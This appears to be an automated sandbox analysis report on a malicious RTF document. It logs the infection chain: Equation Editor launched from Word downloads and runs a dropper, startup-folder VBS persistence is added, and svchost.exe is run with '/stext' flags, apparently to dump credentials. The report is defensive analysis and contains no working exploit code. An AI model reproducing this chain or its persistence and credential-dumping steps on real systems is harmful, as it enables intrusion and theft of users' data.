Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 00000007.00000002.854957272.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.385921207.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: WC5Gv13cOQ.rtf	ReversingLabs: Detection: 52%
Source: WC5Gv13cOQ.rtf	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: WC5Gv13cOQ.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\WC5Gv13cOQ.rtf

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D6C104 LoadLibraryA,GetProcAddress,

5_2_00D6C104

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067A461 push ecx; ret	2_2_0067A463
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00678C68 push ebx; ret	2_2_00678D23
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067AC4F push eax; ret	2_2_0067AC53
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067AC57 push eax; ret	2_2_0067AC5B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067AE5C push eax; ret	2_2_0067AE6F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067A45A push ecx; ret	2_2_0067A45B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006806F9 push ecx; ret	2_2_006806FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00680AC1 push eax; ret	2_2_00680AC3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00678D27 push ebx; ret	2_2_00678D2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067852A push eax; ret	2_2_00678643
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00678D31 push ebx; ret	2_2_00678D33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0068171C push edx; ret	2_2_00681723
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006787E6 push edx; ret	2_2_006787E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006787EE push edx; ret	2_2_006787EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067ABE8 push eax; ret	2_2_0067ABEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006819FC push edx; ret	2_2_006822D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067ABF0 push eax; ret	2_2_0067ABF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0067B3FC push edx; ret	2_2_0067B6CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006807C7 push ecx; ret	2_2_006807CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006825AA push edx; ret	2_2_006825AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006825A2 push edx; ret	2_2_006825A3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00680B90 push eax; ret	2_2_00680B93
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E20A push esi; retf	5_3_02B0E20D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E6C2 push 7E000BC3h; ret	5_3_02B0E6D1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E7F2 push cs; ret	5_3_02B0E8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E4C8 push ss; iretd	5_3_02B0E581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E596 push ss; iretd	5_3_02B0E581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E8F4 push eax; retn 000Bh	5_3_02B0E8F5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E8E4 pushfd ; retn 000Bh	5_3_02B0E8E5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E8E8 push cs; ret	5_3_02B0E8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0E900 push ds; retn 000Bh	5_3_02B0E945

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_00683F21

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	File created: C:\Users\user\AppData\Local\directory\name.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\taskhostw.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

7_2_0041AADB

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00CF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	5_2_00CF4A35
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D753DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	5_2_00D753DF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01394A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_01394A35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_014153DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_014153DF

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D13307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00D13307

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
